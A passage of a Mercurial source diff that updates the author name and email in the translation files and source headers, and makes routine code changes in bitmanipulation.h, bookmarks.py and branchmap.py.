bestimmten Zweck.\n" @@ -18893,7 +18893,7 @@ msgstr "" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -19032,7 +19032,7 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" msgid "" @@ -19050,7 +19050,7 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2014 Matt Mackall.\n" +"Copyright (C) 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" @@ -19088,7 +19088,7 @@ "Vadim Gelfer <vadim.gelfer@gmail.com>" msgstr "" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." 
msgstr "" msgid "" @@ -19101,7 +19101,7 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" @@ -19307,7 +19307,7 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" diff --git a/i18n/el.po b/i18n/el.po --- a/i18n/el.po +++ b/i18n/el.po @@ -1,7 +1,7 @@ # Greek translations for Mercurial # Ελληνική μετάφραση των μηνυμάτων του Mercurial # -# Copyright (C) 2009 Matt Mackall και άλλοι +# Copyright (C) 2009 Olivia Mackall και άλλοι # msgid "" msgstr "" @@ -7606,12 +7606,12 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" "\n" -"Πνευματικά δικαιώματα (C) 2005-2009 Matt Mackall <mpm@selenic.com> και άλλοι\n" +"Πνευματικά δικαιώματα (C) 2005-2009 Olivia Mackall <olivia@selenic.com> και άλλοι\n" "Αυτό το πρόγραμμα είναι ελεύθερο λογισμικό· δείτε τον πηγαίο κώδικα για\n" "την άδεια χρήσης του. 
Δεν παρέχεται ΚΑΜΙΑ εγγύηση· ούτε καν για την\n" "ΕΜΠΟΡΕΥΣΙΜΟΤΗΤΑ ή την ΚΑΤΑΛΛΗΛΟΤΗΤΑ ΓΙΑ ΚΑΠΟΙΟ ΣΚΟΠΟ.\n" diff --git a/i18n/fr.po b/i18n/fr.po --- a/i18n/fr.po +++ b/i18n/fr.po @@ -1,6 +1,6 @@ # French translations for Mercurial # Traductions françaises de Mercurial -# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others # # Quelques règles : # - dans l'aide d'une commande, la première ligne descriptive @@ -9412,7 +9412,7 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" diff --git a/i18n/hggettext b/i18n/hggettext --- a/i18n/hggettext +++ b/i18n/hggettext @@ -2,7 +2,7 @@ # # hggettext - carefully extract docstrings for Mercurial # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/i18n/it.po b/i18n/it.po --- a/i18n/it.po +++ b/i18n/it.po @@ -1,6 +1,6 @@ # Italian translations for Mercurial # Traduzione italiana per Mercurial -# Copyright (C) 2009 Matt Mackall and others +# Copyright (C) 2009 Olivia Mackall and others msgid "" msgstr "" "Project-Id-Version: Mercurial\n" @@ -8881,11 +8881,11 @@ msgstr "" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. 
There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall e altri\n" +"Copyright (C) 2005-2011 Olivia Mackall e altri\n" "Questo è software libero; vedere i sorgenti per le condizioni di copia.\n" "Non c'è ALCUNA garanzia; neppure di COMMERCIABILITÀ o IDONEITÀ AD UNO\n" "SCOPO PARTICOLARE.\n" diff --git a/i18n/ja.po b/i18n/ja.po --- a/i18n/ja.po +++ b/i18n/ja.po @@ -18771,11 +18771,11 @@ msgstr "(詳細は https://mercurial-scm.org を参照)" msgid "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "本製品はフリーソフトウェアです。\n" "頒布条件に関しては同梱されるライセンス条項をお読みください。\n" "市場適合性や特定用途への可否を含め、 本製品は無保証です。\n" @@ -30239,11 +30239,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "著者\n" "\"\"\"\"\n" -"Matt Mackall <mpm@selenic.com>" +"Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -30264,13 +30264,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." 
msgstr "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30293,12 +30293,12 @@ "----------------------------------" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" msgstr "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -30471,13 +30471,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30519,8 +30519,8 @@ "====\n" "本マニュアルページの著者は Vadim Gelfer <vadim.gelfer@gmail.com> です。" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial の著者は Matt Mackall <mpm@selenic.com> です。" +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial の著者は Olivia Mackall <olivia@selenic.com> です。" msgid "" "See Also\n" @@ -30536,14 +30536,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." 
msgstr "" "Copying\n" "=======\n" "本マニュアルページの著作権は copyright 2006 Vadim Gelfer です。\n" -"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n" +"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30825,14 +30825,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "=======\n" "本マニュアルの著作権は copyright 2005 Bryan O'Sullivan です。\n" -"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n" +"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -39790,13 +39790,13 @@ #~ msgid "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Free use of this software is granted under the terms of the GNU General\n" #~ "Public License version 2 or any later version." 
#~ msgstr "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" #~ "Public License の元での自由な利用が保証されています。" diff --git a/i18n/pt_BR.po b/i18n/pt_BR.po --- a/i18n/pt_BR.po +++ b/i18n/pt_BR.po @@ -1,6 +1,6 @@ # Brazilian Portuguese translations for Mercurial # Traduções do Mercurial para português do Brasil -# Copyright (C) 2011 Matt Mackall and others +# Copyright (C) 2011 Olivia Mackall and others # # Translators: # Diego Oliveira <diego@diegooliveira.com> @@ -19269,11 +19269,11 @@ msgstr "(veja https://mercurial-scm.org para mais informações)" msgid "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2018 Matt Mackall e outros\n" +"Copyright (C) 2005-2018 Olivia Mackall e outros\n" "Este software é livre; veja os fontes para condições de cópia. Não\n" "há garantias, nem mesmo de adequação para qualquer propósito em\n" "particular.\n" @@ -31340,11 +31340,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "Autor\n" "\"\"\"\"\"\n" -"Escrito por Matt Mackall <mpm@selenic.com>" +"Escrito por Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -31367,13 +31367,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." 
msgstr "" "Cópia\n" "\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31396,12 +31396,12 @@ "----------------------------------------------------" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" msgstr "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -31581,13 +31581,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31629,8 +31629,8 @@ "=====\n" "Vadim Gelfer <vadim.gelfer@gmail.com>" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial foi escrito por Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial foi escrito por Olivia Mackall <olivia@selenic.com>." msgid "" "See Also\n" @@ -31645,14 +31645,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." 
msgstr "" "Cópia\n" "=====\n" "Esta página de manual: copyright 2006 Vadim Gelfer.\n" -"Mercurial: copyright 2005-2018 Matt Mackall.\n" +"Mercurial: copyright 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31928,14 +31928,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "=====\n" "Esta página de manual: copyright 2005 Bryan O'Sullivan.\n" -"Mercurial: copyright 2005-2018 Matt Mackall.\n" +"Mercurial: copyright 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -41308,13 +41308,13 @@ #~ msgid "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Free use of this software is granted under the terms of the GNU General\n" #~ "Public License version 2 or any later version." #~ msgstr "" #~ "Cópia\n" #~ "\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Garante-se livre uso deste software nos termos da licença\n" #~ "GNU General Public License, versão 2 ou qualquer versão posterior." 
diff --git a/i18n/ro.po b/i18n/ro.po --- a/i18n/ro.po +++ b/i18n/ro.po @@ -1,7 +1,7 @@ # Romanian translation for Mercurial # Traducerea în limba română pentru Mercurial # -# Copyright (C) 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2010 Olivia Mackall <olivia@selenic.com> and others # # # Glosar de traduceri @@ -10032,11 +10032,11 @@ msgstr "(vezi http://mercurial.selenic.com pentru mai multe informații)" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall și alții\n" +"Copyright (C) 2005-2011 Olivia Mackall și alții\n" "Acesta este software liber; vezi sursa pentru condițiile de copiere.\n" "Nu există NICIO garanție; nici măcar pentru COMERCIALIZARE sau\n" "COMPATIBILITATE ÎN ANUMITE SCOPURI.\n" diff --git a/i18n/ru.po b/i18n/ru.po --- a/i18n/ru.po +++ b/i18n/ru.po @@ -1,5 +1,5 @@ # Russian translations for Mercurial package. -# Copyright (C) 2011 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2011 Olivia Mackall <olivia@selenic.com> and others # This file is distributed under the same license as the Mercurial package. # === Glossary === # @@ -15590,11 +15590,11 @@ msgstr "(подробнее см. http://mercurial.selenic.com)" msgid "" -"Copyright (C) 2005-2014 Matt Mackall and others\n" +"Copyright (C) 2005-2014 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"(С) 2005-2014 Matt Mackall и другие.\n" +"(С) 2005-2014 Olivia Mackall и другие.\n" "Это свободное ПО; условия распространения см. 
в исходном коде.\n" "НИКАКИХ ГАРАНТИЙ НЕ ПРЕДОСТАВЛЯЕТСЯ, в том числе на пригодность для\n" "коммерческого использования и для решения конкретных задач.\n" @@ -21807,7 +21807,7 @@ # NOT SURE should this be translated? msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -22000,11 +22000,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "Автор\n" "\"\"\"\"\"\n" -"Matt Mackall <mpm@selenic.com>" +"Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -22024,13 +22024,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2014 Matt Mackall.\n" +"Copyright (C) 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "\"\"\"\"\"\"\"\"\"\"\"\n" -"(C) 2005-2014 Matt Mackall.\n" +"(C) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." @@ -22068,8 +22068,8 @@ "=====\n" "Vadim Gelfer <vadim.gelfer@gmail.com>" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial написан Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial написан Olivia Mackall <olivia@selenic.com>." msgid "" "See Also\n" @@ -22084,14 +22084,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." 
msgstr "" "Копирование\n" "===========\n" "Правами на данную страницу обладает (с) 2006 Vadim Gelfer\n" -"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n" +"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." @@ -22346,14 +22346,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "===========\n" "Правами на данную страницу обладает (с) 2005 Bryan O'Sullivan\n" -"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n" +"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." diff --git a/i18n/sv.po b/i18n/sv.po --- a/i18n/sv.po +++ b/i18n/sv.po @@ -1,6 +1,6 @@ # Swedish translation for Mercurial # Svensk översättning för Mercurial -# Copyright (C) 2009-2012 Matt Mackall and others +# Copyright (C) 2009-2012 Olivia Mackall and others # # Translation dictionary: # @@ -12413,11 +12413,11 @@ msgstr "(se http://mercurial.selenic.com för mer information)" msgid "" -"Copyright (C) 2005-2012 Matt Mackall and others\n" +"Copyright (C) 2005-2012 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2012 Matt Mackall och andra\n" +"Copyright (C) 2005-2012 Olivia Mackall och andra\n" "Detta är fri mjukvara; se källkoden för kopieringsvillkor. 
Det ges INGEN\n" "garanti; inte ens för SÄLJBARHET eller ATT PASSA FÖR ETT VISST ÄNDAMÅL.\n" diff --git a/i18n/zh_CN.po b/i18n/zh_CN.po --- a/i18n/zh_CN.po +++ b/i18n/zh_CN.po @@ -7409,12 +7409,12 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" "\n" -"版权所有 (C) 2005-2010 Matt Mackall <mpm@selenic.com> 和其他人。\n" +"版权所有 (C) 2005-2010 Olivia Mackall <olivia@selenic.com> 和其他人。\n" "这是自由软件,具体参见版权条款。这里没有任何担保,甚至没有适合\n" "特定目的的隐含的担保。\n" diff --git a/i18n/zh_TW.po b/i18n/zh_TW.po --- a/i18n/zh_TW.po +++ b/i18n/zh_TW.po @@ -1,5 +1,5 @@ # Traditional Chinese translation for Mercurial -# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others # This file is distributed under the same license as the Mercurial package. # Chia-Huan Wu <willie.tw@gmail.com>, 2009. # @@ -8191,7 +8191,7 @@ msgstr "\tSee 'hg help urls' for more information." msgid "" -"Copyright (C) 2005-2010 Matt Mackall and others\n" +"Copyright (C) 2005-2010 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" diff --git a/mercurial/ancestor.py b/mercurial/ancestor.py --- a/mercurial/ancestor.py +++ b/mercurial/ancestor.py @@ -1,6 +1,6 @@ # ancestor.py - generic DAG ancestor algorithm for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/bdiff.c b/mercurial/bdiff.c --- a/mercurial/bdiff.c +++ b/mercurial/bdiff.c @@ -1,7 +1,7 @@ /* bdiff.c - efficient binary diff extension for Mercurial - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/bitmanipulation.h b/mercurial/bitmanipulation.h --- a/mercurial/bitmanipulation.h +++ b/mercurial/bitmanipulation.h @@ -5,6 +5,18 @@ #include "compat.h" +/* Reads a 64 bit integer from big-endian bytes. Assumes that the data is long + enough */ +static inline uint64_t getbe64(const char *c) +{ + const unsigned char *d = (const unsigned char *)c; + + return ((((uint64_t)d[0]) << 56) | (((uint64_t)d[1]) << 48) | + (((uint64_t)d[2]) << 40) | (((uint64_t)d[3]) << 32) | + (((uint64_t)d[4]) << 24) | (((uint64_t)d[5]) << 16) | + (((uint64_t)d[6]) << 8) | (d[7])); +} + static inline uint32_t getbe32(const char *c) { const unsigned char *d = (const unsigned char *)c; @@ -27,6 +39,20 @@ return ((d[0] << 8) | (d[1])); } +/* Writes a 64 bit integer to bytes in a big-endian format. 
+ Assumes that the buffer is long enough */ +static inline void putbe64(uint64_t x, char *c) +{ + c[0] = (x >> 56) & 0xff; + c[1] = (x >> 48) & 0xff; + c[2] = (x >> 40) & 0xff; + c[3] = (x >> 32) & 0xff; + c[4] = (x >> 24) & 0xff; + c[5] = (x >> 16) & 0xff; + c[6] = (x >> 8) & 0xff; + c[7] = (x)&0xff; +} + static inline void putbe32(uint32_t x, char *c) { c[0] = (x >> 24) & 0xff; diff --git a/mercurial/bookmarks.py b/mercurial/bookmarks.py --- a/mercurial/bookmarks.py +++ b/mercurial/bookmarks.py @@ -27,6 +27,9 @@ txnutil, util, ) +from .utils import ( + urlutil, +) # label constants # until 3.5, bookmarks.current was the advertised name, not @@ -597,10 +600,10 @@ # try to use an @pathalias suffix # if an @pathalias already exists, we overwrite (update) it if path.startswith(b"file:"): - path = util.url(path).path + path = urlutil.url(path).path for p, u in ui.configitems(b"paths"): if u.startswith(b"file:"): - u = util.url(u).path + u = urlutil.url(u).path if path == u: return b'%s@%s' % (b, p) @@ -623,7 +626,7 @@ _binaryentry = struct.Struct(b'>20sH') -def binaryencode(bookmarks): +def binaryencode(repo, bookmarks): """encode a '(bookmark, node)' iterable into a binary stream the binary format is: @@ -645,7 +648,7 @@ return b''.join(binarydata) -def binarydecode(stream): +def binarydecode(repo, stream): """decode a binary stream into an '(bookmark, node)' iterable the binary format is: diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -1,6 +1,6 @@ # branchmap.py - logic to computes, maintain and stores branchmap for local repo # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -39,6 +39,7 @@ Tuple, Union, ) + from . 
import localrepo assert any( ( @@ -51,6 +52,7 @@ Set, Tuple, Union, + localrepo, ) ) @@ -97,7 +99,7 @@ revs.extend(r for r in extrarevs if r <= bcache.tiprev) else: # nothing to fall back on, start empty. - bcache = branchcache() + bcache = branchcache(repo) revs.extend(cl.revs(start=bcache.tiprev + 1)) if revs: @@ -129,6 +131,7 @@ if rbheads: rtiprev = max((int(clrev(node)) for node in rbheads)) cache = branchcache( + repo, remotebranchmap, repo[rtiprev].node(), rtiprev, @@ -184,6 +187,7 @@ def __init__( self, + repo, entries=(), tipnode=nullid, tiprev=nullrev, @@ -191,10 +195,11 @@ closednodes=None, hasnode=None, ): - # type: (Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None + # type: (localrepo.localrepository, Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None """hasnode is a function which can be used to verify whether changelog has a given node or not. 
If it's not provided, we assume that every node we have exists in changelog""" + self._repo = repo self.tipnode = tipnode self.tiprev = tiprev self.filteredhash = filteredhash @@ -280,6 +285,7 @@ if len(cachekey) > 2: filteredhash = bin(cachekey[2]) bcache = cls( + repo, tipnode=last, tiprev=lrev, filteredhash=filteredhash, @@ -386,6 +392,7 @@ def copy(self): """return an deep copy of the branchcache object""" return type(self)( + self._repo, self._entries, self.tipnode, self.tiprev, @@ -564,6 +571,7 @@ # [4 byte hash prefix][4 byte branch name number with sign bit indicating open] _rbcrecfmt = b'>4sI' _rbcrecsize = calcsize(_rbcrecfmt) +_rbcmininc = 64 * _rbcrecsize _rbcnodelen = 4 _rbcbranchidxmask = 0x7FFFFFFF _rbccloseflag = 0x80000000 @@ -703,8 +711,10 @@ self._setcachedata(rev, reponode, branchidx) return b, close - def setdata(self, branch, rev, node, close): + def setdata(self, rev, changelogrevision): """add new data information to the cache""" + branch, close = changelogrevision.branchinfo + if branch in self._namesreverse: branchidx = self._namesreverse[branch] else: @@ -713,7 +723,7 @@ self._namesreverse[branch] = branchidx if close: branchidx |= _rbccloseflag - self._setcachedata(rev, node, branchidx) + self._setcachedata(rev, self._repo.changelog.node(rev), branchidx) # If no cache data were readable (non exists, bad permission, etc) # the cache was bypassing itself by setting: # @@ -728,11 +738,15 @@ if rev == nullrev: return rbcrevidx = rev * _rbcrecsize - if len(self._rbcrevs) < rbcrevidx + _rbcrecsize: - self._rbcrevs.extend( - b'\0' - * (len(self._repo.changelog) * _rbcrecsize - len(self._rbcrevs)) - ) + requiredsize = rbcrevidx + _rbcrecsize + rbccur = len(self._rbcrevs) + if rbccur < requiredsize: + # bytearray doesn't allocate extra space at least in Python 3.7. + # When multiple changesets are added in a row, precise resize would + # result in quadratic complexity. 
